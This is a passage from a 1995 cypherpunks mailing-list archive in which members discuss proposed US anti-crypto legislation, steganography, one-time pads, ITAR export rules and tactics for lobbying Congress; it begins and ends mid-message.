misuse computers to obtain Government information and, where
appropriate, information held by the private sector, subject to
prosecution.
[...]
 --- end excerpts ---

I seem to recall reading that non-subscribers can't post to cyberia-l. Feel
free to forward this there, if a similar correction hasn't already 
appeared. 

 -L. Futplex McCarthy <lmccarth@cs.umass.edu>	PGP key by finger or server

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAXVuWf7YYibNzjpAQFTQAQAhRnHxtnQ0wcIOEzO+HDgYTr8R4qBzg/h
3UL9gQYWSkGDkhCqR7k31P1Mla7aj5kRHjMg0g7Xgyi2Ag6W89jtc1E4NKj2SP9a
4vlx5qtT0lMtNIRTlUBA5p76qS+EElFAXmbAwjOgH3EJzGRymKF/vE/Unek0M/QS
iI32DT+RN2w=
=hbAd
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:29:39 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: def'n of "computer network"
In-Reply-To: <9507132338.AA07522@toad.com>
Message-ID: <9507140229.AA13447@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



rick hoselton writes:
> Perry, I don't understand.  If the least significant bits in my gif file
> follow all the "known statistical distributions", how can anyone know 
> whether they are "just noise" or are an encrypted message,

Indeed -- how could the recipient even know to look, unless these
things arrived regularly and with a fully standardized form of
stegonography, in which case why bother, all you've done is come up
with a very odd form of transfer encoding.

If the recipient does know to look, that implies either that there is
a hint, in which case the stegonography is useless, or it implies that
you have prearrangement, in which case my comments on prearrangement
hold.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 13 Jul 95 20:37:17 PDT
To: cypherpunks@toad.com
Subject: Legislation question...
Message-ID: <199507140331.AA07147@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


I may be a bit behind the times, but I have a question
about the "ban crypto-anarchy" legislation as well as
the Exon amendment:

Isn't legislation in this country supposed to start in the
House and _then_ move to the Senate for approval?

Why are all of these bills going in the opposite direction?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:36:47 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: OTP server..
In-Reply-To: <199507132346.SAA07316@netman.eng.auburn.edu>
Message-ID: <9507140235.AA13456@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> How about WWW one time pad servers? You browse to your
> favorite OTP server, which has a random number generator
> running in the background. You tell it to give you a block
> of X bytes, and mail it to persons 1, 2, 3, ... N.

Do I get you wrong, or are you proposing the mailing of one time pads
in the clear?

> Enough of these things would be REALLY tough to monitor...

The NSA is willing to monitor virtually all international
telecommunications traffic and try to figure out whats interesting. I
doubt this poses much of a challenge to them. Not to mention the fact
that it probably wouldn't pose much of a challenge to *me* given a set
of wiretaps and I have virtually no resources...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David HM Spector <spector@zeitgeist.com>
Date: Thu, 13 Jul 95 19:36:42 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: co-sponsors
In-Reply-To: <v02120d1cac2aaebb8090@[199.2.22.120]>
Message-ID: <199507140235.WAA21027@zeitgeist.zeitgeist.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:53:08 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: Root Causes
In-Reply-To: <199507140151.UAA01504@arnet.arn.net>
Message-ID: <9507140252.AA13485@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



David K. Merriman writes:
> Specifically, I wonder if it wouldn't be a better approach to *prevent* such
> measures from ever being proposed in the first place.
> 
> Is there any precedence or possibility of either filing civil or criminal
> charges against a Government official for their _official_ actions?

Not only is it a bad idea politically, but in fact members of congress
are made specifically immune by the constitution from any legal action
being taken against them for their words or actions during sessions of
congress by any body other than congress.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 19:58:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <9507131857.AA12796@snark.imsi.com>
Message-ID: <9507140257.AA13867@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Perry,
> 
> I have all I'm going to take of your acerbic rudeness to me.
> 
> I will no longer be responding to any of your messages.
> 
> --Tim

<sigh>

Everybody needs to take a deep breath and count to 1,000. Seriously,
we're all feeling plenty of stress today. Various people have been
talking about getting out of the U.S. while the going's good (?), and
it doesn't sound much like hyperbole this time. It's not surprising that
we're releasing our frustration on each other, lashing out at the nearest
quasi-tangible targets.

Don't let them do this to us -- to you !  Remember, in the grand scheme
of things, we are all very definitely on the same side of Evil like
S.974. We need to pause, gather our wits a bit, and focus on some debate
and action, rather than directing our anger at each other. This is no
time for infighting, grudges, etc.

-Futplex

[if this was too touchy-feely for ya, 
 feel free to vent some steam in private email ;]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 20:01:32 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <Pine.ULT.3.91.950713205857.19725A-100000@krypton.mankato.msus.edu>
Message-ID: <9507140301.AA13498@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Robert A. Hayden" writes:
> On Thu, 13 Jul 1995, Perry E. Metzger wrote:
> 
> > Anyone who is saying that it is impossible to fight the legislative
> > battles hasn't been thinking. It takes millions of dollars,  but there
> > is a lot of money out there to be had in my opinion.
> 
> Nobody's saying it's impossible, what we're saying is that we don't have 
> the resources to DO that on the scale that is needed.

Since when?

> Maybe Microsoft does, but we don't.

I must admit to only having an academic knowledge of this process, but
I strongly suspect that you are incorrect -- everything I've read,
watched and learned of indicates to me that there are enough people
and companies with an interest here to raise a few million
dollars. Consider that Netscape alone is a very wealthy company that
would have its marketing plans strongly disrupted by this new piece of
congressional trash.

A few million isn't enough to destroy carreers on the scale of the
NRA, but its enough to make things very messy for people.

> What we can do, however, is to shape the culture of the net.  That
> culture will have to eventually be listened to by DC.

The beltway crowd doesn't log in. They ignored the petitions sent to
Leahy for S.314 because they didn't think of the people who sent the
petitions in as "real". I doubt they will understand the net for many
years to come, whereas we have to stall out the NSA and company now.

Incidently, unlike the NRA, I believe our task is merely to stifle
legislation for about five years, at which point it will be too late
for legislation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 23:01:05 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <ac2b562c03021004310a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:57 AM 7/14/95, L. McCarthy wrote:
>> Perry,
>>
>> I have all I'm going to take of your acerbic rudeness to me.
>>
>> I will no longer be responding to any of your messages.
>>
>> --Tim
>
><sigh>
>
>Everybody needs to take a deep breath and count to 1,000. Seriously,
>we're all feeling plenty of stress today. Various people have been
>talking about getting out of the U.S. while the going's good (?), and
>it doesn't sound much like hyperbole this time. It's not surprising that
>we're releasing our frustration on each other, lashing out at the nearest
>quasi-tangible targets.

Note that I didn't post that to the list.

Your requoting it, without the intermediate quoting of the person who _did_
post it to the list, makes it appear I was spewing this garbage to the
list, when I wasn't.

I don't care for your pop psychology. I would've followed your advice and
left these comments in e-mail only, had you done the same.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Thu, 13 Jul 95 20:09:45 PDT
To: hayden@krypton.mankato.msus.edu (Robert A. Hayden)
Subject: Suing/Reputations (was: Root Causes)
In-Reply-To: <Pine.ULT.3.91.950713211304.19919A-100000@krypton.mankato.msus.edu>
Message-ID: <199507140314.XAA05815@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



Robert A. Hayden writes:

> If I understand, you can't sue the government for just trying to pass a
> law, or for even passing it.  What has to happen is that somebody needs 
> to be arrested and charged with breaking the law before you can challenge 
> them.

Correct, insofar as American jurisprudence is concerned (and a big hello
to all our friends in the rest of the world!).

A few citations, hopefully relevant:

"States and state officials acting officially are held not to be
'persons' subject to liability under 42 USCS section 1983." Wills v.
Michigan Dept. of State Police, 105 L.Ed. 2nd 45 (1989).

Title 42 of the United States Code is the section that describes
the process by which one may sue a government official. However:

"...an officer may be held liable in damages to any person injured in
consequence of a breach of any of the duties connected with his
office...The liability for nonfeasance, misfeasance, and for malfeasance
in office is in his 'individual', not his official capacity..." 70
AmJur2nd Sec. 50, VII Civil Liability.

So the trick is to sue the offender as an individual, and not as a
government official.

"A  plaintiff  who  seeks  damages for  violation  of  constitutional or
statutory   rights  may  overcome  the  defendant  official's  qualified
immunity  only by showing that those  rights were clearly established at
the time of the conduct at issue." Davis v. Scherer, 82 L.Ed.2d 139,151.
 
In summary: Failure to object timely is fatal. You must immediately let
someone know when they are violating your rights, and what the possible
penalties are, and give them the opportunity to stop, and be able to show
as evidence that they continued their actions despite your clear warning
of the consequences.

     Title 42 USC )1983:
 
     "Every   person  who,  under  color   of  any  statute,  ordinance,
regulation, custom, or usage, of any State or territory, or the District
of  Columbia, subjects,  or causes to  be subjected, any  citizen of the
United  States, or other person within  the jurisdiction thereof, to the
deprivation  of  any rights,  privileges, or  immunities secured  by the
Constitution  and laws,   shall  be liable  to the  party injured  in an
action at law, suit in equity or other proper proceedings for redress."

Notice that this statute recognizes that "statutes, ordinances, regulations
and customs" can violate your rights. Where they do so, it's up to you to
challenge the law's jurisdiction over you. Failure to challenge jurisdiction
at the first instance of a rights violation can be fatal to your case, and
will be seen as an admission that the law in question does indeed have lawful
jurisdiction over you.

     "To  maintain an action under  42 USC 1983, it  is not necessary to
allege or prove that the defendants intended to deprive plaintiff of his
Constitutional  rights or that they acted willfully, purposefully, or in
a  furtherance of a conspiracy.  . . it is  sufficient to establish that
the  deprivation. . . was the  natural consequences of defendants acting
under  color of law. . .  ."  Ethridge v. Rhodos,  DC Ohio 268 F Supp 83
(1967), Whirl v. Kern CA 5 Texas 407 F 2d 781 (1968)

     Further, United States Code, Title 18, section 242 provides for "one
or more persons who, under color of law, statute, ordinance, regulation,
or custom, willfully subjects any inhabitant of any state, territory, or
district to the deprivation of rights, privileges, or immunities secured
or protected by the Constitution or laws of the United States. . . shall
be  fined not more than  $1,000 or imprisoned not  more than one year or
both." This means you can sue for conspiracy if there's more than one
person involved, such as a magistrate acting in collusion with a police
officer. And you are able to sue them as individuals because:

"...an...officer who acts in violation of the Constitution ceases to
represent the government." Brookfield Co. v Stuart, (1964) 234 F. Supp
94, 99 (U.S.D.C., Wash.D.C.)


On a more relevant note:

> Although publishing an "Enemies of the Constitution" list all over the 
> net, listing which congress-critters opposed the constitution (suck as 
> Exon) might be interesting.  Might even make a good web project.  *ponders*

Well, the Internet Advertisers Blacklist seems to be doing pretty well,
despite the obvious backlash by the likes of Marthe Siegel. The Idea
Futures market also seems to be doing a hot business. The recent focus
here on 'moderated' areas and whether the signal-to-noise ratio is worth
the added layer of 'authority' shows the need for individual choice.
I may choose to have person A forward me Cypherpunks excerpts, person B
specific rec.toys.lego postings, etc. Or I can use software (getting
better all the time) to act as an intelligent agent and find articles
for me. Or most likely, I'll use a combination of the two, and I suspect
most folks will choose this as well when they are made aware of the
respective advantages and disadvantages of each method.

In sum, "reputation markets" as Tim described are just starting to take
off. The need for strong security tools increases with it. What if some
big-name megacorp put up a page with all kinds of financial transaction
options - and suffered a mass boycott because they refused to use PGP?
If someone feels like creating an "Enemies of the Constitution" list, I'd
certainly be interested; even more so if there were competitors doing
similar projects.
  
Folks may think the pot's boiling now, but remember: We're the frogs
who, at the very least, know what's coming, even if we aren't able to
jump completely out. "Forwarned is forearmed." Every time government
does something stupid and outrageous, they piss off a few more people.
Mass disobedience (preferably nonviolent) will become more common, and
this is definitely a Good Thing.

(Blatant plug: My home page has links to both the Net Advertisers Blacklist
and the Idea Futures page, along with lots of other things. It's at:

http://yakko.cs.wmich.edu/~frogfarm

All constructive comments are welcomed.)


-- 

 frogfarm@yakko.cs.wmich.edu | To ensure ABSOLUTE FREEDOM, take RESPONSIBILITY
    imschira@nyx10.cs.du.edu | Encrypt! Encrypt! All-One-Key! Complete Privacy
             Damaged Justice | through Complex Mathematics! God's law PREVENTS
Need net.help? I'm available | decryption above 1024 bytes - Exceptions? None!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 23:31:57 PDT
To: Kevin Stumborg <cypherpunks@toad.com
Subject: Re:
Message-ID: <199507140628.XAA21517@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:57 PM 7/13/95 -700, Kevin Stumborg wrote:
>send me mail

Here's some!


You might try sending mail to cypherpunks-request@toad.com
(or majordomo@toad.com) with a one-line message body saying
        help
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 23:33:00 PDT
To: Ray Arachelian <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507140629.XAA21600@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:53 PM 7/13/95 -0400, Ray Arachelian wrote:
>> Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
>> Anti-electronic Racketeering Act of 1995. This bill makes important changes
>> to RICO and criminalizes deliberately using computer technology to engage in
>> criminal activity. I believe this bill is a reasonable, measured and strong
>> response to a growing problem. According to the computer emergency and
>> response team at Carnegie-Mellon University, during 1994, about 40,000
>> computer users were attacked. Virus hacker, the FBI's national computer
>> crime squad has investigated over 200 cases since 1991. So, computer crime is
>> clearly on the rise.
>
>Eh, what do "virus hackers" have to do with encryption, why is it these 
>morons justify the destruction of encryption by mentioning hackers and 
>viruses?

You're parsing the title wrong.  It's an act to support racketeering
through opposition to electronic communications.  What viruses have to
do with encryption is that encryption makes it easier to prevent viruses,
and Senator Grassley wants to stop that.  And the term "strong" was used in its
correct engineering meaning, as in "It's a vessel of fertilizer which is
very strong and promotes growth".


>> Mr. President, I suppose that some of this is just natural. Whenever man
>> develops a new technology, that technology will be abused by some. And that
>> is why I have introduced this bill. 

Yup.  Quite so.

>> Computer fraud accounts for the loss of millions of dollars per year. And
>> often times, there is little that can be done about this because the computer
>> used to commit the crimes is located overseas. So, under my bill, overseas
>> computer users who employ their computers to commit fraud in the United
>> States would be fully subject to the Federal criminal laws. 

Hey, Julf, we've got your number!  And we're making sure nobody's got any
encryption to prevent fraud with.

>> Mr. President, this brave new world of electronic communications and global
>> computer networks holds much promise. But like almost anything, there is the
>> potential for abuse and harm. That is why I urge my colleagues to support
>> this bill and that is why I urge industry to support this bill.

As above.

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 13 Jul 95 20:34:21 PDT
To: cypherpunks@toad.com
Subject: Re: who knows about Security First Network Bank
Message-ID: <v02120d01ac2b962a9373@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: blanneau@pic.net
>Mime-Version: 1.0
>Date: Thu, 13 Jul 1995 17:04:41 -0500
>To: MINITERS@Citadel.edu
>From: blanneau@bilbo.pic.net (Bazile R. Lanneau, Jr.)
>Subject: Re: who knows about Security First Network Bank
>Cc: www-buyinfo@allegra.att.com
>
>Are you trying to find it?  http://www.sfnb.com
>Neat site!
>
>------------------------------------------
>Bazile Lanneau
>Britton & Koontz First National Bank
>Natchez, MS  39120
>601-445-5576
>blanneau@pic.net
>blanneau@bkbank.com (Soon)
>
>
>>>Date: Thu, 13 Jul 1995 13:32:04 -0400 (EDT)
>>>From: Syl Miniter 803-768-3759 <MINITERS@Citadel.edu>
>>>Subject: who knows about Security First Network Bank
>>>To: cypherpunks@toad.com
>>>Cc: MINITERS@Citadel.edu
>>>Mime-Version: 1.0
>>>Sender: owner-cypherpunks@toad.com
>>>Precedence: bulk
>>>
>>>There is an extensive article in the July issue of "Bank Technology News
>>>about
>>>a startup Internet bank by the name above.
>>>Does anyone know about this outfit.
>>>
>>
>>-----------------
>>Robert Hettinga (rah@shipwright.com)
>>Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
>>USA (617) 323-7923
>>"Reality is not optional." --Thomas Sowell
>>>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
>>
>>
>>
>>
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 13 Jul 95 20:36:04 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Eudora MacPGP Woes
Message-ID: <v02120d09ac2b91d84fcc@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:40 7/8/95, Black Unicorn wrote:
>I have noticed that an X-Attachement: header is added, but I have no idea
>how to remove it without opening the Eudora outbox with teachtext or
>something.

Highlight the file name on the attachments line and hit delete to remove an
attached file request.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 20:43:28 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Legislation question...
In-Reply-To: <199507140331.AA07147@tyrell.net>
Message-ID: <9507140342.AA13574@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Fraering writes:
> I may be a bit behind the times, but I have a question
> about the "ban crypto-anarchy" legislation as well as
> the Exon amendment:
> 
> Isn't legislation in this country supposed to start in the
> House and _then_ move to the Senate for approval?
> 
> Why are all of these bills going in the opposite direction?

Legislation can originate in either house. The constitution says only
that 

"All bills for raising revenue shall originate in the House of 
Representatives; but the Senate may propose or concur with 
amendments as on other bills."

This particular rule is often breeched in reality, by the way, but
there is no enforcement mechanism to stop it.

BTW, in re suing congressmen

"The Senators and Representatives shall [...] in all cases, except
treason, felony and breach of the peace, be privileged from arrest
during their attendance at the session of their respective Houses, and
in going to and returning from the same; and for any speech or debate
in either House, they shall not be questioned in any other place."

The last part being operative.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 23:47:07 PDT
To: "It's supposed to crash like that." <cypherpunks@toad.com
Subject: Re: Encryption and ITAR
Message-ID: <199507140645.XAA12031@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:30 PM 7/13/95 EST, It's supposed to crash like that. wrote:
>Anyone know how far ITAR reaches?  Is there a list of programs that are illegal
>to take from america anywhere else?  My company does a LOT of buisness (80%)
>outside the US, and I wonder if they are maybe pissing off the NSA or somthing
>with some software they take with them.  (a DES encrypter, and some other
>encryption stuff)

It's the other way around.  Anything that does encryption that they _haven't_
explicitly given you permission to export, or that isn't subject to subtle
and arguable interpretations of the law (or blatantly obvious interpretations
of the First Amendment) is verboten.  So buy your crypto stuff overseas,
and import it, and write letters to your COngresscritters about how annoyed
you are that you have to do this.  Might as well send them a bill for the extra
expenses you've had to incur; they won't pay it, of course, but it should 
amuse some of the Republicans....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Silversher <silversh@rmii.com>
Date: Fri, 14 Jul 95 00:14:12 PDT
To: "Joel B. Truher" <truher@mojones.com>
Subject: Re: The MoJo Wire thanks you
In-Reply-To: <v02120d0eac2b65b1c651@[204.188.118.233]>
Message-ID: <Pine.SOL.3.91.950713235634.4000B-100000@rainbow.rmii.com>
MIME-Version: 1.0
Content-Type: text/plain


Please unlist me.

On Thu, 13 Jul 1995, Joel B. Truher wrote:

> Thank you for your help in our beta test!  Please come back soon,
> and send me mail if you'd like to be removed from this mailing
> list -- we may send a new Web product announcement every few months,
> and you'll soon receive a survey of your opinion of our site.
> 
> More info on The MoJo Wire:
> 
> 
>              "More fun than a secret decoder ring!"
>                                -- Jim Hightower
> 
>   "Mother Jones magazine is turning the tables [on Gingrich]"
>                                -- LA Times
> 
> Mother Jones is pleased to announce the official release of our
> redesigned WWW site, now called The MoJo Wire, on July 14th, at:
> 
>                     http://motherjones.com
> 
> * See Newt Gingrich's secret list of major funders on our "Coin-
>   Operated Congress" feature.  Gingrich is fighting the FEC in
>   court to keep this information secret, but you can see it here
>   for the first time.  See the ten worst, the ten richest, the
>   dirt on all of them, and help complete this interactive
>   investigation project.
> 
> * Newly revamped on-line chat software, called Live Wire,
>   provides the best Web-based political discussions anywhere.
>   Create hyperlinks in the words of others in this new feature,
>   which already contains several lively debates.
> 
> * The July/August issue of Mother Jones magazine is available
>   only on The MoJo Wire.  Read the full text of the magazine.
> 
> Many thanks to our team of two thousand beta testers!  With your
> help, we've worked a few of the last kinks out of the system,
> added a few things, and now offer the service password-free.
> 
> For more information about The MoJo Wire, send mail to
> truher@mojones.com, or call me at 415-665-6637.
> 
> Joel Truher
> Manager, The MoJo Wire
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Fri, 14 Jul 95 00:25:57 PDT
To: perry@imsi.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <Chameleon.4.01.2.950714022431.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote:

>"Robert A. Hayden" writes:
>> We've seen the enemy, that the are the 535 senators and representatives 
>> in D.C., and the staff in the White House.  It's time to shore up our 
>> allies and enter the battle witht he best weapons we have; information 
>> and popular use.
>
>As unpleasant as the congress is, it isn't the enemy. The governmental
>forces desiring control are not the same as the congress.

This is true.  IMNSHO we are witnessing yet another case of the 
representation of an illegitimate constituency.  Grassley is not representing 
the people of his state -- he is representing and carrying water for federal 
government interests.  While some people used to acidly refer to "The Senator 
from Texaco" and such, it is a much more common situation that some Senators 
and Representatives represent federal agencies in matters before their 
chamber that virtually NO VOTER would ever think of or could even discover as 
a matter of personal interest.  You can be sure Cathy Cornflower of Cherokee 
didn't start this by writing Grassley and suggesting that RICO be expanded to 
cover distribution of non-GAK crypto.  It is inconceivable that more than a 
tiny handful of Grassley's constituents would even recognize anything in his 
bill if stopped on the street and asked about it.

Agencies develop "friendly" congresscritters like the Soviets used to develop 
"friendly" journalists and politicos.  It wouldn't even be all that 
surprising if similar methods are used.  The "friendlies" take obscure and 
no-so-obscure issues before their house on behalf of the agencies.  At some 
level this is probably necessary, but with all those folks getting comfy with 
each other up there in Disneyland-on-the-Potomac, it's impossible that unholy 
alliances do not develop.  The "us vs them" mentality of a congresscritter 
grows to encompass all three branches under "us" and views the unwashed 
masses as "them."  In that view the suit from XYZ who comes over to confer 
with the staffers is "one of us."  He gets right in (while visiting 
constituents wait stupidly for an appointment that the elected official will 
be -- we're so sorry -- unable to keep).  He's bringing up an issue of 
concern to "us."  "We" have a problem that needs to be fixed by modifying 
para (a) of sec (3) to read "shall" instead of "may."  "We" will feel very 
important and may even win some special stroking or quid pro quo for fixing 
"our" problem.

The one real flaw in this is that the electorate was just left out of the 
loop, and kept in the dark to boot.  When the elected official went into "we" 
mode he ceased representing the people who sent him there.  In these 
increasingly totalitarian times it's likely his representation was 
distinctly CONTRARY to the interest of those who sent him there.

There have been cases of agencies approaching "their" congressman and having 
completely new language inserted in a conference bill -- language that was 
never in the original, never offered as an amendment until the bill from each 
house went to conference, and never debated when the conformed bills returned 
for final vote.  It's the norm that such maneuvers go completely unreported 
in the media.

>Congressmen are by and large harried and ignorant people. They have no
>idea what any of this is about. We have the choice of letting Louis
>Freeh do all the educating, or having a white shoe Washington PR firm
>do some of the educating, too. I favor the latter approach.

There is also something that is almost always overlooked... taking names.  It 
is possible to "pull on the string" and follow the visible event back to the 
less immediately visible actors.  The congresscritters, though by and large 
harried and ignorant, are not always guiltless.  At best they are willing 
agents for little bits and pieces of the fabric of overweening statism.  In 
every case, though, there are faceless staffers who may also be harried but 
are usually NOT ignorant.  The staffers are often the ones who "sell" the 
congresscritter on signing onto this or that non-voter issue for this or that 
self-serving political reason.  Staffers also include the people with huge 
political axes to grind -- people who gravitate to the positions of writing 
the text of the bills that translate the generality to which the elected 
official has acceded into excruciatingly detailed and usually 
confusing legislative language.

There's a relatively small number of really activist people in government, 
and not all of them are public and visible.  It's possible that some 
congresscritters could be defeated with the aid of dissemination back home of 
information on the non-voter issues they've championed and concise 
explanations of how many of those issues work to harm their voters.  It's 
also possible that some of those faceless staffers could be turned into 
liabilities by focusing some light on them, thereby reducing their 
effectiveness and employability.

>This is not to say that we shouldn't be widely deploying crypto -- we
>should. (Of course, offshore sites will always have crypto available,
>but...) 

It would seem that the U.S. may lose a number of good minds who may prefer to 
live and write code in other parts of the world.  This has been a developing 
trend for other reasons, and now people who like to write crypto will have 
another reason to look for a new home.

>This is also not to say that Congress doesn't pass very bad laws.

Name a good one!

>However, I very, very strongly urge that we not assume that nothing
>can be done. Just winning a couple years time could totally alter the
>landscape.

Your urging is appropriate.  It's odd, though, how the country seems to be 
pulling itself in two diametrically opposed directions:  On the one hand the 
electorate shifted significantly in the '94 election, responding with greater 
enthusiasm than even the new young Turks in Congress seem to fully 
comprehend, and seeming to be fed up with too much government, prepared to 
commission the dismantling of federal bureaucracy and getting government the 
hell out of their lives.  On the other hand we see bold and impressive moves 
on the part of politicos and bureaucrats toward a suffocating, draconian 1984 
police state.  We have even heard increasing choruses of "Just following 
orders" and "Just doing my job" from mindless hatchetmen these last few 
decades -- bizarre and incredible echos of the excuses offered in post-WWII 
war crimes defenses.

The country cannot move strongly in these two directions for long: Something 
has to give.  The longer this division persists, the greater the gulf that 
stretches between and the more "interesting" the times that will result when 
one side prevails.  The side that prevails will consume the side that fails 
with an intensity related to the energy built up in the process.

Crypto is presently on the periphery of the larger schism, though it's 
conceivable that twenty years in the future it would be clearly understood by 
most people to be central to privacy in an information age.  The moves to 
head crypto, and thus privacy, off at the pass are being made now, though, in 
an effort to prevent a future in which large numbers of people understand how 
to maintain privacy when everything is a bit stream. 

If there is a critical and unique difference between this and other 
seemingly similar situations it is the 10-15% monthly growth of the Internet, 
something that is orders of magnitude greater than what humans are accustomed 
to perceiving, estimating, handling, coping with.  If recent figures are 
accurate, 7,500+ new web pages have been created in the 33 hours since this 
thread started here and perhaps 100,000 new people are on the net in one way 
or another.  It's unlikely that Grassley or Exon or Leahy can assimilate all 
the implications of that rate of growth.  "Senator, the blob is at the door!" 
 "Well, call the State Police!"  "Uh, sir, they're at least three hours away. 
 In that time the blob will be larger than the State of Idaho!"  

The politicos have never before dealt with a sizable "throwaway minority" 
whose current growth curve intersects the U.S. population curve in 24 months 
and the world population curve in 4 years.  In a couple of days there are 
more new people getting on the net worldwide than are contained in a U.S. 
congressional district.  Partly as a result, there are issues getting 
attention that would have easily been contained just a couple of years ago by 
the policy of benignly overlooking them.  No longer.  If a net mobilization 
was disappointing last month, try it this month and see the difference.  
Movements that took years to form and grow decades ago take days or weeks 
now.  Soon they will take only hours.  

We are just now cresting the big one on the supercharged roller coaster of 
high tech infoplosion, and as the velocity rapidly builds there will be 
profound shock among the old and the slow.  Even the savvy will be surprised. 
Push this medium for all it's worth.  Find ways to promote informed privacy 
as a ground-floor issue for newbies and get them to have a knowledgable, 
vested interest in it.  Get people onto the net.  One new person today is 
four or five people a year from now, 15-28 people two years from now.  Since 
a lot of it spreads from person to person, new people start with tools and 
concepts they get from others, so the initiation of a new netparticipant as a 
privacy-aware crypto user tends to spawn subtrees of new users in the same 
mode.  Use the growth multiplier to outflank 'em while they're noodling.

Would it be more productive to hire the white shoes or start another few ISPs 
and shepherd the new users to be privacy-aware letter writers and faxers?  
Educate your ISPs.  Any ISP that isn't political in this age is brain 
dead and dead weight.  Any ISP that sees its political interests as somehow 
different than those of its users (recent lobbying to shift burdens away 
from national services and onto users, and recent AOL admissions of 
participation in what sounded like entrapping users) is worse than brain dead 
-- it's part of the problem.

Bolivar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Zachary H. Hanna" <zhanna@jax.jaxnet.com>
Date: Thu, 13 Jul 95 21:08:48 PDT
To: "cypherpunks@toad.com>
